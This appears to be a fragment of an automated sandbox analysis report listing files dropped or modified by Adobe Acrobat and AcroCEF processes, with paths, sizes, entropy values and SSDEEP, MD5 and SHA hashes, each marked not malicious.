SSDEEP: | 3:OEmtlEYenzpssgr/fgsCrZClW/tdy4krRp/Yll+SHY/Xl+/rQLve:mlEznFsxfgs3GmFQAS4M |
MD5: | B0658251D05369465D02F5ACDEBAB26C |
SHA1: | 2B857F2167C5FD73775F6786E413D7B6CA51A20A |
SHA-256: | 99590D886A4C79785EF4BEA55F2F433EDA19995F9455BD95A9B77F8525351265 |
SHA-512: | 3E69D85CDB98E596AE784B9F6D40B2EC629D0B785D2D3CF7085CEC684562A55BD9A9A26175693D77E3CD3B6CFB5D334E95ADD22772A63F5E13631ACAFB67E136 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.166868670363704 |
Encrypted: | false |
SSDEEP: | 6:iO4qVGQWbrGqM+q2PqLTwi2nKuAl9OmbnIFUtSqVGQWbcaZZmwsqVGQWMMVkwOqx:7nGQH3+v8wZHAahFUtZGQ0/LGQIV5TwM |
MD5: | 0DD0A2B31D2BC4CD843D8975DEF55CE6 |
SHA1: | 027D04890BAFFB5C78A3CAD7EFBC54EC7350294F |
SHA-256: | 29681F3BDF2DF24E2951B647DEA1438E6121DDFF3E444BD20A7ADBE9E8B9EA3E |
SHA-512: | 201213EB5EC044575636925AA6B2EE16895FFD24223B4023AB5F0C040C796F2BF5AB3E93E39435E6BA126C9E864CF611E84747E03DEF3A714644D0CD87306580 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.166868670363704 |
Encrypted: | false |
SSDEEP: | 6:iO4qVGQWbrGqM+q2PqLTwi2nKuAl9OmbnIFUtSqVGQWbcaZZmwsqVGQWMMVkwOqx:7nGQH3+v8wZHAahFUtZGQ0/LGQIV5TwM |
MD5: | 0DD0A2B31D2BC4CD843D8975DEF55CE6 |
SHA1: | 027D04890BAFFB5C78A3CAD7EFBC54EC7350294F |
SHA-256: | 29681F3BDF2DF24E2951B647DEA1438E6121DDFF3E444BD20A7ADBE9E8B9EA3E |
SHA-512: | 201213EB5EC044575636925AA6B2EE16895FFD24223B4023AB5F0C040C796F2BF5AB3E93E39435E6BA126C9E864CF611E84747E03DEF3A714644D0CD87306580 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.166584556911438 |
Encrypted: | false |
SSDEEP: | 6:iO4qVGQWDvpQ+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqVGQW1UqdWZmwsqVGQWs/a:7nGQ8RQ+v8wZHAa8uFUtZGQug/LGQ3/a |
MD5: | EF908B9DD60C6AA9E90C84CBB8CDC7AA |
SHA1: | 24611B6C9FB1B2A3850EF85E5BD25EFFA996FF39 |
SHA-256: | DCB60AD6E223C75F7E80C67DEF7061761E3343E1608B04B648CCA2790A9662CD |
SHA-512: | F40BD2E1F6857D7B9AADFBE03695DEB334BD8A7FAD54D0D4DA3C1B91C4CCD7196998A5338D42F8FC90D9E1F0BE4951922E4246D835683387FA5B5FFE1E8D3A47 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.166584556911438 |
Encrypted: | false |
SSDEEP: | 6:iO4qVGQWDvpQ+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqVGQW1UqdWZmwsqVGQWs/a:7nGQ8RQ+v8wZHAa8uFUtZGQug/LGQ3/a |
MD5: | EF908B9DD60C6AA9E90C84CBB8CDC7AA |
SHA1: | 24611B6C9FB1B2A3850EF85E5BD25EFFA996FF39 |
SHA-256: | DCB60AD6E223C75F7E80C67DEF7061761E3343E1608B04B648CCA2790A9662CD |
SHA-512: | F40BD2E1F6857D7B9AADFBE03695DEB334BD8A7FAD54D0D4DA3C1B91C4CCD7196998A5338D42F8FC90D9E1F0BE4951922E4246D835683387FA5B5FFE1E8D3A47 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\570c25be-64f6-4e54-8369-694665e19908.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.961129226325379 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqp/sBdOg2Hkxcaq3QYiub5P7E4T3y:Y2sRdsPdMHkI3QYhbt7nby |
MD5: | 73707D37DA308755035A757848F0CDE2 |
SHA1: | E84594199C7331857A5890E4700BE5BD9DA18599 |
SHA-256: | 6DD44F57BD41B8602F93327EEC8E08217A2C16AEFA972146E05DCD805B3744B4 |
SHA-512: | 71132B4080D613A8BB4BAD1180F3F211DBCB4C27C952752455DA6C6027FD3BB331EAE4A11AE3C4C7010B80D106AC2CB43479CB7ABC64420D4FF9C450906EC909 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.961129226325379 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqp/sBdOg2Hkxcaq3QYiub5P7E4T3y:Y2sRdsPdMHkI3QYhbt7nby |
MD5: | 73707D37DA308755035A757848F0CDE2 |
SHA1: | E84594199C7331857A5890E4700BE5BD9DA18599 |
SHA-256: | 6DD44F57BD41B8602F93327EEC8E08217A2C16AEFA972146E05DCD805B3744B4 |
SHA-512: | 71132B4080D613A8BB4BAD1180F3F211DBCB4C27C952752455DA6C6027FD3BB331EAE4A11AE3C4C7010B80D106AC2CB43479CB7ABC64420D4FF9C450906EC909 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.222474394885696 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz8LOoU/q:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz8j |
MD5: | B42F73FF76989388B4090977622D3D37 |
SHA1: | 39E19EB3F4AB1A11DEA03ADB3E3713E3AB56A930 |
SHA-256: | 354B0498A2D0D677FE0F430100766FEC50FCFF870C127A38E2FCA30F8163B4D7 |
SHA-512: | 18B8BD5D41C6ADD89ACD2113CD7754AF5C49322D73EC0AC4E43A140B656BD2B2F0516AA552E39660E48DE985F561685F800FD0ABE7C252A4038F995CEF00DE27 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.105805859017786 |
Encrypted: | false |
SSDEEP: | 6:iO4qVGQWzQ+q2PqLTwi2nKuAl9OmbzNMxIFUtSqVGQWWpdWZmwsqVGQWWpQVkwOP:7nGQiQ+v8wZHAa8jFUtZGQnpg/LGQnpV |
MD5: | 7CFB203519145325E44D4D7BA39506D7 |
SHA1: | E217D1C48D2CBD7D16A3C624E46D51442CB9CA91 |
SHA-256: | FE14F7173C10ED946EEC73681220FD560F08934311357A279596B4B276099181 |
SHA-512: | ED8C294864C4D1E14FADDB8DD7EAE0CA42946A3504CF44557F20FE3E2B42BCEE3ABAF0A506CDFB4F516E8C28C647FE923B7B332B668BBC5BE8DC6D257BD02697 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.105805859017786 |
Encrypted: | false |
SSDEEP: | 6:iO4qVGQWzQ+q2PqLTwi2nKuAl9OmbzNMxIFUtSqVGQWWpdWZmwsqVGQWWpQVkwOP:7nGQiQ+v8wZHAa8jFUtZGQnpg/LGQnpV |
MD5: | 7CFB203519145325E44D4D7BA39506D7 |
SHA1: | E217D1C48D2CBD7D16A3C624E46D51442CB9CA91 |
SHA-256: | FE14F7173C10ED946EEC73681220FD560F08934311357A279596B4B276099181 |
SHA-512: | ED8C294864C4D1E14FADDB8DD7EAE0CA42946A3504CF44557F20FE3E2B42BCEE3ABAF0A506CDFB4F516E8C28C647FE923B7B332B668BBC5BE8DC6D257BD02697 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.437985805402617 |
Encrypted: | false |
SSDEEP: | 384:ieBci5GNiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:ehurVgazUpUTTGt |
MD5: | BEAB294881F30AD4D402E436C3AADDCE |
SHA1: | 85B8F27E0A0E44983234939D1E9A38FB783E7FCC |
SHA-256: | 841129674649FF8160A74C6FFA2F1898C97FB0724D7916FDC4DAEA5E534B1876 |
SHA-512: | 2EFD78B0BF44F9D9975C829885A2364FE790C2FEBB50CC9A137F203AD8DCDEBE331C25EC95235EEF4F118368406942E4DFF77B93EAF303945D0D4A866BC66F15 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.21201473809843 |
Encrypted: | false |
SSDEEP: | 24:7+t8Z36wKBpqL0MzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf2:7M8VWjq/mFTIF3XmHjBoGGR+jMz+Lhu |
MD5: | 27CE207AF1166F8582C0CC135985FCE8 |
SHA1: | 0E49DCF38CCE0FABF21C18AEA0B5452DED8A0810 |
SHA-256: | F531764A3B320E33671A3A37D9218AC2A0E6AA196662FE92E09DD89B77E6BDA9 |
SHA-512: | 28D04273EF742EB4C90BEFA29A19D2A4B9A5FE859A84A3223DF6217A7F74DDBD3A3B8986D696A66280EABBA1CBF281B68E988B45216A4F795FB843B8B19B8991 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkl/Z1HstfllXlE/HT8kj4zvNNX8RolJuRdxLlGB9lQRYwpDdt:kKfeT8quNMa8RdWBwRd |
MD5: | 7B95E5AFFE82B1D435F96786AE1AFDDD |
SHA1: | 6E1DB60118CB806B9DB6E27F424D76FC4122F6E3 |
SHA-256: | C98DB7623C122DBB84001D4F37097D2D4E18C6E4EAC75B6C5E9686F17EACD531 |
SHA-512: | D3FE8CB77432E984880DA1B2942BC07ED867ED132ADBBF7345B2DF2AD581A5B72589DEA6EDBB404259621A4019FC07BC95C150EF0659F092876F40B8209EA114 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1330815974444413 |
Encrypted: | false |
SSDEEP: | 6:kK5L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hiDnLNkPlE99SNxAhUe/3 |
MD5: | 03766000183C801F8F96AC277F60BF6B |
SHA1: | 00E192565DAB26ACD243E5589C5F9BDEBE369CB9 |
SHA-256: | DABB4B0E81356BECBA6D4355F00396F264F30FCC82A3F784FF1239367A9D91E1 |
SHA-512: | 9B522174FD93B1CA139CAD70116E68E56A5764A0C3C64C6AB92422F2B62BA0FEEBA940871D30BDCEB0C2B2B829B032AC016CF1EF5C53F8F53F70158B0977DF67 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3658918513556415 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJM3g98kUwPeUkwRe9:YvXKXuTXifT5LjIPiGMbLUkee9 |
MD5: | 09A8C2DCC9FEED5693812D6712EB7CAE |
SHA1: | ABD0882B832D5952675EB5E16BDDF4060656D33C |
SHA-256: | DB5F5964BD2E28CC14D74040EEB1BDC70EFA1BAAB131DF8D69EEA44236619D44 |
SHA-512: | 0549C871518F69A39982B1F4119E9A6D7658A9F086A1446513DBE709DC80E7E4C213CD04B30A3535E94E8CC9FA652C31602ED7C5F3A2472F0078499FAB82C737 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.322354427997575 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfBoTfXpnrPeUkwRe9:YvXKXuTXifT5LjIPiGWTfXcUkee9 |
MD5: | 60E345ADA120077DDA7F71C186CB9F52 |
SHA1: | 2AB4045A5C2992D2B1605BC58228C19A7CC96CAB |
SHA-256: | 077B9C8AE38FEFAE091B679C6C71F38B3151C640E114C6EFDDCD637B1E2A665F |
SHA-512: | B95A59C395AD348E007A55CFAB5404F7DD28A710C5E0A43ABFEC028F0316B3927D6520184CD1169B08AA3343B2D6F21439119BEDDBA61699858E5994AFEC00B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.301552175966779 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfBD2G6UpnrPeUkwRe9:YvXKXuTXifT5LjIPiGR22cUkee9 |
MD5: | 13CE7C2753CBA0DCD1CE5DB69EA3F591 |
SHA1: | 45B539D9DF607984B94682FFC54B35EC126F9827 |
SHA-256: | C7D337605F64DFE78F47378EF43ED93B2EC3A85250188C788353D855E8A773A0 |
SHA-512: | 73A11665AEC1C8C29769FB3986B57B957894D4EF157D4A7F96AE3614D034E2C8708C64598BD91A02787DD99DF5CA10CBDDDA36EC5AE60C921CE53283F4121725 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.346982601985908 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfPmwrPeUkwRe9:YvXKXuTXifT5LjIPiGH56Ukee9 |
MD5: | D2F622E46602E45168ADE059C48132FC |
SHA1: | CA0FCAEB38F2338720E863D7BD22F10D9A05EFF1 |
SHA-256: | 81F4DA1FFA4C9263ABAC181019F89C6A5DF65CF436B439DBF3057341EB5EBA83 |
SHA-512: | 7DC684F2E9BB7B2BF862D7EDF66DE5BB3B41B89FFE4C1DFF86991E5B8A35851BE2536B86A5EF309B993CB446D672A150809AFE6A04B8BF907275B5A9FA911BD0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.692293001762111 |
Encrypted: | false |
SSDEEP: | 24:Yv6XubifT5XInpLgE9cQx8LennAvzBvkn0RCmK8czOCCSE:YvHbitXWhgy6SAFv5Ah8cv/E |
MD5: | 2009962CC7D41E17764A4D445CA72754 |
SHA1: | 2D7D4ED4674055CAA28E3717DD6A3F85369573D1 |
SHA-256: | 17B8D73C7DA3E5B2B5C57CDE2B023B21267D704BBBF8144A946B5843EECA60BD |
SHA-512: | 6033F349E25BDFE766BF5F7DF21E731AB4C9FC215FBB4F9839D5164FFE69C4D1002DDA2FCEA1A39563B54D73849D527743F9988E6BE2985338C97EA39F5F93A3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.317353030761706 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJf8dPeUkwRe9:YvXKXuTXifT5LjIPiGU8Ukee9 |
MD5: | 016540E3418E98DB5626F43063EB5359 |
SHA1: | DF1EA95858E046A2255C0BC0F481AFAB0D0E05EA |
SHA-256: | 3016745B7DB2240A2CE928EB4DEFE6DC047140F29342F9C61F05B5E52F35B336 |
SHA-512: | A8166145BFE30D5530BD8D1AFFB6E6EAF2AC3E307E26A3329B278EB7F8E842D916E5FC0909773573EF529879859C9F1535BF33B6AC0DBC442B7AAB4080CFA1B4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.308695401390649 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfQ1rPeUkwRe9:YvXKXuTXifT5LjIPiGY16Ukee9 |
MD5: | 86402BD13E8D890302EB3F26F08971D5 |
SHA1: | FBEE7BA228E325C7404F8B763E2CB9286EA08082 |
SHA-256: | 166BF3113CEA4D9BB0B74890B04E86068AA47CE5D8496586AB219DD863549634 |
SHA-512: | EF78966566C859A20E17F5411D234642476CD1E4D23917AB5A1DDDF73A6E93B315DF77B787F7E7D8B2C4161833809BA244C7C70F9CFA9131AE42B47E93A726A3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.321796672682621 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfFldPeUkwRe9:YvXKXuTXifT5LjIPiGz8Ukee9 |
MD5: | 9FE7B89415B2D2E85D52DFB9D829D510 |
SHA1: | 0C1E205C1B497976B4B684FCA08C584D949DD9AD |
SHA-256: | 5CBF4728C6E656EA4D9851515CB312AAB502D3F37986FA36134AB232A16205D8 |
SHA-512: | ED504DCF231F89E387538396C4F34852E81267E4529D04C5FD94D0AC6B4B2F605E55A7EF0F3354B3A8286BBE5A24315EA298BC396149F53E118AC0B122204579 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.342673448127883 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfzdPeUkwRe9:YvXKXuTXifT5LjIPiGb8Ukee9 |
MD5: | 88167F8A6D3D7B84B840B40CA322C23A |
SHA1: | 8DB7FAB955C24FAC16E2E7B2C78304B88A5741D2 |
SHA-256: | BB54BF042834E23CC57E295D00D498165A3BF9E5E64891931C8B2F230C6CED10 |
SHA-512: | 2259126EC7074A8F84FCF7159AEC45B4CB360E89DCC656EADA406EEC8EFA7DB5FD929E0B492B6F6EEED674ADE2D154718971BFD2A503A8DDC4CD04D4CCFB1251 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.323507313876677 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJfYdPeUkwRe9:YvXKXuTXifT5LjIPiGg8Ukee9 |
MD5: | 70CDB9CEBFCFF969453E53F0187AFB3D |
SHA1: | 85865798BACA000EDC4C7201575F3D72714C2639 |
SHA-256: | EE02183665C8C17AA8A296DCAF6B32F995FD9FC9DA0665D52C86CD8FECB76590 |
SHA-512: | 3D95C124CA41F4E6CD4B9D35186B58A58509677E9F08D80AA39D4E8855B28937ABB9844E7BACB0006824333CEB6C8BB19E83B3A7E65A390EDAB2978DEE8C4F3F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.309971547859351 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHOTX5cl2mSg1c2LjcWkHvR0Yr9oAvJf+dPeUkwRe9:YvXKXuTXifT5LjIPiG28Ukee9 |
MD5: | 56DF9D5FF96D50504838C30801F029F6 |
SHA1: | 0535BF386ABE175C50FFF9C9289C9C2128AC7546 |
SHA-256: | ADAD832C4F06B347870AE5EA333FB0CF2ED41B4F816463E7750C3D3459C96E5A |
